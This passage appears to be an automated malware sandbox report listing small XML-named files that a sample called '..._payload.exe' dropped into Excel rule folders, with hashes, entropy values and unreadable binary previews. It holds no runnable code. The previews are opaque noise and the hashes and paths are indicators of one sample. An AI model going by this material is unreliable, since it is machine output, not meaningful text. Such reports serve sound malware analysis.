                                                                                                                          Entropy (8bit):7.731353023163562
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YXzyo2ugaHfV5ZjuOxZFzYWFOjCiUI5MbD:YWZ7aHNzCOxZF7OjFFGD
                                                                                                                          MD5:10543DEAD122907B9E815E5BD1BAFD5D
                                                                                                                          SHA1:CCC30590A2E7AF3764033C00572699B681AAD4CA
                                                                                                                          SHA-256:1774EEC0327F21A230A4DE5FF9D83EA906523A1FF79AA99BA4754B4AA78BF8CE
                                                                                                                          SHA-512:36022E9E6D5F6A1DD5A53D68BFD0F60BE5E6FFC1D74AC3682E5899A6100D6703A11A096A2CE67F6D7918B15D811EE4B0CA1085BE9AC45D2543E9534A2318FA61
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.,M...X..c .1.|g......_j....Q.;c`...Y2...Ues...K.....j.%..!.n.V.-DG...)....B..k.?...a..gJw.. I...s....^..V..J..w.q.*.M..r..,...H.<..L...2.}T....I;7.2..z...17.+C.m.Z'.B.%..i.5..s..q.....J6...C.-.9.[..Ea.Oa.3V..=...0._?....#...........i=........,;..c`~(J..-...:.w..#.).Yf...+z..l..U..=....=k.......pP......,|U'P2....#K"..c..c_....#.;.^-p.u..@b[..-.g.j.3..>.y..kh.u..>....".l.OP....4..#.//M.){l..h.....]a.....Rp.2.'.L.\../...]y..j.E..^G...B.....:........U3...1)...[C..@..S..'....C-.^..8P,T..z..|Z.E.\.&...).<r...?..[an}.;.j.>.Q..9....K....z!qKm]...&...z..Z.........E.[Omy...S..}.T.l^......q."\.......Y-...W..9.V.......fy..P.g.`.Q..'I..D?........x>D.F.O..3...-.YdOX..p...l..k....}....@.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120657v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):752
                                                                                                                          Entropy (8bit):7.729433975971761
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:hmOtT/43D4h9bgIQxopcDciY+zwGIXybIM17qTR2aJyR7cDmmADOIlJ7q5bTciik:hmOtT/43ABTgciYVGARxacyBYbD
                                                                                                                          MD5:5F205B1D5718DCC6BFD8B2F9915DB786
                                                                                                                          SHA1:659AAD0361F02E1BB6AF0E3D182E796AD78FA3DD
                                                                                                                          SHA-256:93212C46567B3ACEF01F3BA12BF2A0EAC588A4DB630AFDF5A5745329D5EA128F
                                                                                                                          SHA-512:645FF51DAF808568BA97C185DB8E4B4A7141AB5E2AC2119FBAADCCE54FB36EF1716E0DB73F3D857D7F896F92750710113DF28730097238382EE45958D682129E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlwz...z...#.I@q&pl.6r.....t9.....z-.E^..h........s].;.$.xr.s.6.....W.|......~...R?..U.8...n.{P?....(A.O^b..>j9&.,9...G`{1.|..........cF...m.@......^U.Q.jM...0s..5..=S.Y.....Ym.j.<...g=H/...j......C.......qT.d...:{T.m...'b0.......+.]B.O...)<...._.>.~..J.2N...0..{....'Z..$./;...o.i..a.#............e..J..w..%..A"...HlCc..'...LM%.1".....w.[.u...}..M...Xt...Z.BW.+....u....;...RR+...ZE..4...0.._d.)Z.].ip...i....#Ih...V.S.4..l.8..pw[..h.7.G..6.Y.@..?Q..x..kN%tt}f.0m.......T.# 9P>..~..z..iI.z.m.'.3$.#.....l...!.,[ma.$...._._.A(...,0......J>.......I..t.y..>...q.r....*.......}K:H.2.*M..=....c.....z.K[..N....'........N..i.C.......4..E.~.J...T..2phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120658v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):805
                                                                                                                          Entropy (8bit):7.757819475079691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:7BdoUpiAISeyz+UP497+rVihuT+3WF9msQNFa6ZgeRcZBK9jBRGnkzxRDoq0lwSx:grSeynw9IViIYhXTgmRGnoDD3mJ+MbD
                                                                                                                          MD5:286F547908358DB43242ACFEF32E6DFA
                                                                                                                          SHA1:DBFA1A094352656EDC0AA5ED4FA4F073A25DA0E6
                                                                                                                          SHA-256:422BE5E069E4B3F55205ECA7A4749B211E798B1D57C13BBB127A5FFAE81F4385
                                                                                                                          SHA-512:CEEA637DA0A97DC028B53C7791B5248585EAEB0B66E324C8BD3EA3B926954004F768212C16C02544CC85E5C9842D376B7F4CDA6E81DCF221EC4659E2054F67A4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml........\..\.a|......e.../.<......:....c..n..E...Bo.B...,%.K..Z'...R}..D..vQTt;..;.....z.`R..X<...._.A..b~..$.M.J!!....K`K.5.ercnw......:U.l.3..11B..F...F.[n....j..&.\..\...nH...3.w..0..cMA..|....y.C...}.....YUR.3...B.#....y.u.$..,..<.4...`..HB.me.z{M:...dc?....Q...k.......W.dW[b/]U@..x...?....L........u....[./....P..W...i.E>x^.9Y..T..M......b~=.u....O..<....t..R..R...Fj.Sv.2....je.p.e....u)3..d.s...c......J.v.uUP.h.k..:.....z..;..a.q.PI.(.x.(...;...~........'pH-.t.&....C\.K}.c:~...g....2.......Z..&B1..).8z..i.V..m.k..~sV.._.4m.(1K_.=1..D...q.... S...).....C..l".)......\.^.#.6.X.V...< S..+.q.J.XVi..@"..&k..k)..!...MT....fQ.c;......3..8#.V..#.fAL..........P.k....^D...d....4..)..W..Q.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120659v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):801
                                                                                                                          Entropy (8bit):7.734262177984948
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:cNC5qLTaYKcYqCZCWOX+JgjDLshvF9flgeSobHSqKHzlFiks65HMXw0FiSOLzq53:oAa7bY3aDLOt9iNosiklsA0FmLGbD
                                                                                                                          MD5:E33363C320D89C798EBA271B1926DE7C
                                                                                                                          SHA1:20840047F69CEBB24486DB57C1CEB3EF54C93597
                                                                                                                          SHA-256:896DF402B2D0381ECF4AF40BD53D8CB16E5A1CF5E766F646D01A0C92E4E599F3
                                                                                                                          SHA-512:CF6C6DEE0422A0E86A898EDC74FD1F510E248A32A37C651281DEC72C9B2A23C8ACE6889A847A5D17D8C2107A316A2C692842F4DA571C6EBD9D6760671DAA32E6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...(2..s.....).......9..'+-...xd...<...$.(.m`'......(..C.{..qw..p...9.._\n..<....D.!..g0..nV.Z...r.......9KZ.U....ZGq.8..fC......v.U.\$......+.%..\=..81.4.G..Ci..;..Q...Dx..;M..E.cl...-\..J_.w#.i=.e.md..Z.H........3...bX&B....Y.{....={^.z......h.M......!.6.c8..c.:&../m..w.v[......vd7"..O..s..V}......p,e..m..x..qt..|......U.j.@q..g.".A.".q..<.E.V...A.E>w.P..Lm.l.i..X..4b..I.1...<..]?W.....[.8aPD.l].....[g.zM.q...(.o.p...b.kg..)?.c..*D.b..si...".[......2V.F..G}.bf.....Wg....{r.....(.O)!....5^..].z.\8V..9c&...U..a0.....E@....w4...h.W...&....@....._..y.~H...R.^..~..R.ZU....X./!#n.8l..o._4.......`..&k..=/..;..r..)[Z*..9R.2.L5R......s....3.. .4..U-..DHRf...0R...?..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120660v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):818
                                                                                                                          Entropy (8bit):7.742320443792112
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:OPhvEzrOt4P2TpKRb6ChspiW8dw0nQ2pqM+AB9YrpmDQ5I5wrBcemWqxjq5bTciD:OWhZv8Ka0nQ0HnpQyirBcrWvbD
                                                                                                                          MD5:D8F93ECBDD0F982E6D887B16549A8CA0
                                                                                                                          SHA1:0C487B643C89D7E7B23A4D5B1CB524547292B842
                                                                                                                          SHA-256:FF427D3B136FD2692BAA4C5E844B6E97C97C6DB9F9FBE8C1FAA9B72EF5565AAD
                                                                                                                          SHA-512:E611AE30D060596BE64199DB4968D8687C5D08055042A220BE31DAA33F08D29FC4B24A24342ABB9641BAFC41AA5BFAC30ECF89871408219880703F4300F4AD6D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..(.>K7.D{n..).....5..%...TN./..!...d.P..........O...........l3.^....1.....]......m....f..8./`...b..NE...)..mKI.>i$.kuY .]..... {..'V.a....jA;..'x.p......(....Z..P.F...!T..g&D.:6.L...l X.........Cf+.<...S*..w.-I.L.(n.....7.l...A|.*K...4....;..p[.u...o.vw..Ji.cN.{.P..z.....m~G.n....A..l...$.@B/..o.....#ed#.N.........7y#d.~..I..A...0.).; :.gu.g.i. .hv.H..~r./...a..M..?..{.:..J..;>....l=.wH.......V;C6..z.'.T/.../...sBo.>....r./.A..O..jH.L.3.h.......]....m.VJ.....t...I...|..GpH...:.A...Z.UQ=!.N.3......5cU.)h=|$... .2.R~)]...F.Da.../..1.....|.ip...\..C...0.uu......jt.(..}nJ...\...9..-.-...\8.....8L..s>..4,h.E...W....q.7....|u..I....].I...%FF....+.x....;v........[...S0..y.'.Q.%.U.c.....#....aZ.h.^.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120661v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):744
                                                                                                                          Entropy (8bit):7.679369947802942
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TeqSCJd3nZ8CeMn6QtX3nJE9/HghSsy8HXvl+SIq/7Y/lwdVZiJ+8qPnqEgIIVm5:WC33WChE5ghJvN+SN/7Yyd3id2nqEwm5
                                                                                                                          MD5:9F7399C53806804D94278E13D56D2762
                                                                                                                          SHA1:9AB8F7FE27C3527F6BA19F5D925CA2941D4CE52A
                                                                                                                          SHA-256:3E63BB2DB683EDD63370ACB11AC66F60B8536FB1E8AA92BEA4E5A0F925E26941
                                                                                                                          SHA-512:B8F717E1AB0FE546D1F1112ABC1F79D25FDE7866D07F66FF81E70025256D0F610C9FF09141DCA565D1ACDE92B840E2BD084FFC01EA05D63A15B988CF34029241
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml#...NoS..V...z.......=@......Vh,.E....~.%...B{sO... [...X.&19.m..P.w..y..n .H.....+.......y...'XKt:n.Z...6gr]......).9..:R.7..V.......9.X._8..`JLw.D.......R...N7ER.N.$.....Mpm.Z...8....0.......g6...>fJD,luWp....m.....c..z..o4Kc.]..!..4p[...TV#O..@..f'.4.....WO.C.....*{......x.........w......U.......=(.N.k.X?.....N..7.=....z..<.m....MS...b.....".7.GIUY/a..b..tr.!0.K.6&..N{.7.<.A...}.&}D.^>..%c..8.#<.B}.....[$<.N.............4...o...7..I...:.h.!...2o.Y.o.K.DP..~]h../oP...?.V...C...O.6...]..X.g.............~`Wr#.......2>.v......ez..0..}.x$\..)......\..S..a......l.).1...Z.r..]..6../...z.B..u....R...:8.....}2>..-..7nH.0..n[phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120662v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):803
                                                                                                                          Entropy (8bit):7.723002264774415
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:0fcJmvNKmmJVAqU7MqnuUM/kaRjerDfSYbD:Ecc1XGVK7juU3a2SCD
                                                                                                                          MD5:B3B74599079DD6F25722A10635DCA12B
                                                                                                                          SHA1:FFC84CBDE77E07EBF1E9F84C3C387BAEFA9C059F
                                                                                                                          SHA-256:4419B5D752FBBC7363329246F18A27796D3558571D1715FAA1EDD3C53BD91784
                                                                                                                          SHA-512:436608A7FDC13617EC17204F0DA5A17C322ABC20C4580C36BE2507F19416DF3402776BE057D56E742831C335AE5B1C0D8C6CE6388D686D82CB81DF1FE38EB961
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlb-.].`@..P;..KjA.}"UI&!-.]....c.......$a.y-5....~..%..E.........r....R..........~e.._......a0..83...K/.K}b.:..\w...//.z+../..:#~m@5r....{}K,.\M.....IB.o<........]Y..-..Y.$.s.~....E.LRn.Q....WC..U|{k.'....M......B...N.:^.2=.\8"..`qZh.b.M...WljI..6..9B..T:..p..f..V.(./.I.....Rt.W...../B.f...Im.!......eu...O.....#0U.0...i.R..PfG*C..\(....w<..8...`.V.(.....m...c....q/8.1$P..........j..m..,..#\?...bz.7.r./N!.l2V...>....\........`.3Y...QW...o..Z0bR.^..c.M%.(g>..t..e........)...-Vt...7'..l.w..e..e..........p......0[-..z...@X../Y..3.9+.f...CS.<9F#./.j...M.A.-.......GS...Hg.!UO.\....<G+5......6....1.1O.d.\...|..x.8...BN....W0>Jf9M.Tj.....a..$AXK.....Y.V5{..X7Z.A.r.W.....?..\...8Q.8.@.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120663v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):760
                                                                                                                          Entropy (8bit):7.727785609491668
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:0nQzCumTw8EEdvw8j1hn92ZVIDenTuegl7Ep0sk7avrpuuGhLYF7nkq5bTcii9a:0QzCxTvog1hEiMqegho7rp1TVbD
                                                                                                                          MD5:D04582F0BE687E0E59AE53259675689C
                                                                                                                          SHA1:10CEB791E3224029A54BEB234D923C72767EC79E
                                                                                                                          SHA-256:55ADDFB4E54BFF2866786ED52B05B509EABC92A8CDA5C8C2419A7015DF472B09
                                                                                                                          SHA-512:669A2B5F9E2B1524E2C1EA35107F923A7E201E97D03A21AE835E02E6E340E9BB59911E29A1D40A7616F088CAB137987AC4C911C13375E426E2525B0EB802ACD0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...._...|............9...H..a.9...i. .....b.. .. n.\..../....V..$.".......~=.e...cA.6qR.../....=!$..@........9..F;x.dY.!...u..'..n."]..,..z. *.~.h.....C2.....j)x>...%.@8N=...V.V%.n.....qL.-..T....J.,.........<G..L1...*..!;...M(t.Je!.A.l...,.....g...S....J.>.Vi7...\.(OO$.....p1.;.;&Mn...!eh.y.;8rU....P03......T....$.z.3e.8).K..+p_.'s.....|`.<...)..GB}......5....Qt....V....\...s....#..>.8.r..Lt.v.....t...n..`..$....;e.....J....;.P...k.v8......../.......65{EH.q...mz......!.}..&;.hF."|.j1.R.......B.0e). g.o..!|.K.Lz...v.)50.g.w.[.=.e4...p.Y.P/EwN....,...../.....m...f.u..E.tX..Ubg...7'.mj.....i......>.....w..%......u[....O..e...x....<~9.{bAf...*O2.\)bJ.CphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120664v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):835
                                                                                                                          Entropy (8bit):7.784100059155369
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:j9uO9oHMHHIsTbBfAIrbbP7e8hZdGwfpwnXbD:ZVaHMHHJrbbje8hfVfErD
                                                                                                                          MD5:A9788E46999A9BE4E7710BBEC292527D
                                                                                                                          SHA1:15A4E7BA7B69164A2CA1918C38A8136A5FC41E7B
                                                                                                                          SHA-256:C53C79A884A9EA96A49D6A97557638F96EEE7F86D8C6CA07B8681344D1E83FD3
                                                                                                                          SHA-512:E5F7595CC7F577B1EC99D47D2A22A0989F364EB354B315AE34EAD5EB9793617FA68B5C25F77ED7C56DE1A88ADAD0D1E21A45FB012E1E9F2B2313D97C5855596F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....`..........~.g.x@j..a...w...I..m.D.Y..1_.G4.....Eh&.{._.r]..S.3...I...[.eW.T.\......LF1!&iD#..X....~.5 ..q.....2...f./.M'...-...;)A.V7m..!.;..J0..6b..9p.'iDZ.-.Z..izeI*N.Y8......Tu:.)v.F.4.b|>sz....h0L...[..:R.T!..k.*...".+..J7ZJ...w.OL!...h....qW....qm.`.#.c....h...A....7N3\...;.....c5.?......U..l|..J.._\.E.]............6;.*.-&...%g..J2..1{%.......m.bG.Y.}z..<s....v.[....R.7.Q'0....O=WFV.e....s[.*...kxU..fY.L....~*....U...=...b.....6{.e3.Kyx..%..\.....^.K.U..d.6....<.......i.7.(t...Z.Bq.X...8...l..t5.j...:.,....z)N._?..o.....5.G.X...."$E.<.......]T.<...4..t.P..M....{...Q.. +.Q-....=.:.W...-..Z.......+f(0...!y.9M.P.....e%Z....3..t.....p.......A.L.+oN.l.h..w.+..3.....9d,.g.....2.?5.pUa...?.6..W....`..M..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120665v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):740
                                                                                                                          Entropy (8bit):7.728459213138075
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Et042r1xJGuj+4z/gYqRbkM9bo3fayR9ycnJByuklRVAzFtyoJW7yFcyuJU9rZIA:EtB2r7B4R2MwKpltoY7yGyBZkWZTbD
                                                                                                                          MD5:767542322FD840ADD2AED5476898C787
                                                                                                                          SHA1:D75CD78753F57C103A5A62B1CD855CE9CA17C6CC
                                                                                                                          SHA-256:5C5D5EDBC85B3419F6F192344A27667DA8AD5DA031D906FE2F086672C3AC42DC
                                                                                                                          SHA-512:58D226E0EC4EC99CFC591382AEE662E370962C43A801E217C1EC700451BD94DFA6CF5A6C8CF82728DD061755438E2DDF59795E4FDA4CFB10312582DC374FBBF3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml8R=7..'..,UX..z...w.../..("W....8....r!Y.....Q.....q....fbN...M.....c...B.j...Y?..D"..2..Y..{..}....._..I_.......C....g............`..x..39Z..wP....L.U4T.V.#.I.......@..../hl.4%C...En.w...va....../y..!9}W..9.k+.%.x.w.0....|.........cM..sL.:.....@...\\....N(.,K....N......z.{._B.5.dF`..Z..... Y...CC/...+..q......0....V.SsQ.w.H.1...(jd;.....P....J.%b..Y...Q."V.9ii.><.?....)/F...5.h.<........$V...(.....^.R.R!c........].x.z.g..jq.qj..F....T.|MJ..d...!..d.|...>D.[..=.DQ.y..b..<+....oAB.....]..O.Ei. ..@...NP......A..b.~y........5"..e.....Fd..uO|.V.w.29.S....{.....K..lk9&A...O[X@..AG8..qL...*.............'m5+0.9.9...vkE....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120666v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):807
                                                                                                                          Entropy (8bit):7.7527877905867175
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:jJRPeTVJKeebCN+PDiNBYn9zLn3lQ6aNvTstb7+bD:VRPeJKeebCEDGyJn3lQ6wvS78D
                                                                                                                          MD5:94501D481791C2F433E133A6A8FF352B
                                                                                                                          SHA1:2B2C8B2492B037D84B3DC74976FE96D9566F4946
                                                                                                                          SHA-256:26EFDEE36289F809BDFF9B68E6F61681518F8ECC0C89D58E77EDD9CB0FE8D233
                                                                                                                          SHA-512:FE4F4B53714201A3C2DC8B0616C231B3B5C1E6F5B170143B219DFF1A6924A2F55F739E3F2F77F185EE51480338BF9F516AB526E0E830798B3F805ABFD0293C82
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml\....|u_".T...@t[h...L8.t\.|]m....L..NQ....%...Gt.%...;)..~.`p.#.zt.j...U....W.EW..{.....:.-.E...Y...J...E..\..lg.._.p...{. .qIr..5.....R.1...K.....G.EC.....mS~...w....+.cA],.J(...........>B..S...a......j..]....}^Ky.....F.&.4%.;.m?l.....<`X&...j~.P..../%..#F~g.h<...e.hK..K..M......ye...f.eq..\.B'$AL{.Z..Zj.....4.....gD.q.dt.....i.".......c...L..5LV".J.]....l.B,.Z........8........E[..P.8..|..E...R.~....T`.T.=.U...q*A9..z..}fA.4.....X&#ad.U.\..)....Qw.F=.......Q7z..*@V.?....3T..-$._/.....9.!..`.S...#.,.Vk......r.s..<}.#-....H9..i...s..v......u..n.o.&....8'._....=.v....0.....o...Z&G.Z`....%.......6.(..<..>.....{`...y.H....~.D..M.jm...(..?*..v........W..I.l...M...l..B...%...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120667v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):741
                                                                                                                          Entropy (8bit):7.73100085248885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:MJ9LlX97Vu34YjDcOzvBB9I4n7uviWU0G3wwAlbuMANwy3wrKK2Iq5bTcii9a:C9XwbfzvRn7uQwJ3yArd2pbD
                                                                                                                          MD5:14BA74DE289576D8EC46CB03DB33F2F3
                                                                                                                          SHA1:FE9D2F60B1FAB2881BCA059896864A80216469FC
                                                                                                                          SHA-256:62395851075BEFA7D28BEAA9F0C2013FBD6CDF445239F322DD66E12967B98F30
                                                                                                                          SHA-512:0FDAFA5F3CAF0E7EFB568510839ADC70A32778DF0A988FD40072FDB880A368A431E02A38839A856F88BC39EE49A662DB2B6C45889E97BCE788BDFBA2BE30DEB8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.......h..N..F.Ki..+I....G=*.H.+...g..kI......Y.j../.....c.f9........i..N...G6_d...P.L.x.CJ.`K.47.a.l..Z............5s.:8.y."..c@...#..z...jh...J.....7.....D..|..F...h(~.8...i....b.....0+.!..:.>.....P.T..X....w..0..^...(...N.V..]......A..\..q...D...U=.`..v....y.....TW.W...^..ga.Te..."....ZX>.q}fs_.]0..$z..~YZ...d.&.@.}.~./k....../.........&...E%..l..%U!........1g...ZY...\\.x.y'..........Z.."......c..|.].#...2...{..eI.....0._..C.e.X.....R....M]..n.G..8../.Z?.@........{j.....zeJ......d:.P.K.X+.*k..#`... ...~.....P.^JU.].O.$.T.....KP..NF=Mv.....z..c...vp.j..T....X....C.0.t.M.MS...+.R...\.~..{.o.....]..+.4..x..LphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120668v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):802
                                                                                                                          Entropy (8bit):7.733145568612869
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:4UGrKtBfcgUR7gFlJccUeFeZRf9dCbwsI9pYQN7M7bD:ZIQBfu6ccUmG9dCbhI9qQN7AD
                                                                                                                          MD5:E84001798910A1CADEDE43FFF3861EC7
                                                                                                                          SHA1:C3BE8DCD5F81627EDD3A9E38C38D0E16B9A768C8
                                                                                                                          SHA-256:9B89EF953837F3958A245090AA01745A6ACAD440D66089CD9A10097DA6CC4AB7
                                                                                                                          SHA-512:68589C9682A0B7DAE7F88F625114E260D95926C333CEDF04405A583BA52840B31DF1AC9B2F770E6F6596ACF100BDAF91B42F41B8625888B44A6267CACA12E4F6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlC.B..+(..g.K,..@Y..."..d.t,{.S....../..J..B.O...).q..%...9..W[.oF.w..k....9.....i...M.=_.....L..*$.z...s......5>...\.S....X.B...E]7.^...o...M.....Aa,g|......h.*.X+P.V..J.XuMD.^.38.d.K........S~..]Y....w.O.|o..N."...b&...~.......8.^V6.d..}.............?..5.%.^/IJ......x../...Y.b.o...j...!....J..1....;.4m......;MO..p..$Z,3..$...o.U{[p.!o..........N%....:S.I .0.......]....W6..Kd..$.m>.k..V*..M...h......q.~.....4M.....F..GNyaYpxv`..R...K.r..I.v.jf.A..*.....).[V=..]...2*.-q..c..v;...dz........,....a.8c.`1!okg......8.Z.....lLq.*.WrkV.......9!v....X...>...!.&L.(.(O..k?....\...........*g$.%.l..p.l..{..w......X.....W....=..kQ.b._r'....2.9j..b.>..s.../.0......m...L...(.%..kq.+\.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120669v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):749
                                                                                                                          Entropy (8bit):7.729663809571549
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:U4o9xDh4Rooi8YtYj6i/AbosNUw7V90KY1llGOq9VvgCofXfXKPjgh5cIi9zq5bj:CT1+ooi8YtYmiWHRVY1XGr9V4CWfXKPq
                                                                                                                          MD5:ED4F63124E5210AE0FCA74BC113BE0F8
                                                                                                                          SHA1:12D286528B1F1FB1471D81B72AD5DEDE51BEE2ED
                                                                                                                          SHA-256:802C36F5B6F8B08F7C9E56183298507E5049D8B33A1F71834E602685A3928CF4
                                                                                                                          SHA-512:56A26386D3F71594A2B9632DABB86E94E3BC60E0C1FC9BA9AD240041383A7D3ACFB93A811FE03A7DC0C058DFD04852495593067C2E173E9D3C2A241B6C07D06D
                                                                                                                          Malicious:false
